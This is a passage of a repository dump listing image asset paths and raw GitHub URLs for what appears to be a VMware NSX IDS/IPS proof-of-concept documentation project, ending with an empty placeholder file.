https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_16.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_17.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_17.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_18.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_18.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_19.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_19.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_2.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_2.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_20.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_20.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_21.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_21.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_22.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_22.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_23.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_23.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_24.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_24.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_25.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_25.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_26.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_26.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_27.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_27.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_27_SMALL.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_27_SMALL.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_28.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_28.gif
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_29.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_29.gif
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_3.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_3.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_30.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_30.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_31.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_31.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_32.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_32.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_33.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_33.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_34.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_34.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_35.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_35.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_36.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_36.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_37.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_37.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_38.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_38.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_39.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_39.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_4.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_4.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_40.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_40.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_41.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_41.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_42.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_42.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_43.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_43.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_44.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_44.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_45.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_45.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_46.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_46.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_5.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_5.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_6.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_6.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_7.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_7.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_8.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_8.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_9.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_9.PNG
--------------------------------------------------------------------------------
/docs/assets/images/NSX_Logo.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/NSX_Logo.jpeg
--------------------------------------------------------------------------------
/docs/assets/images/placeholder.tmp:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------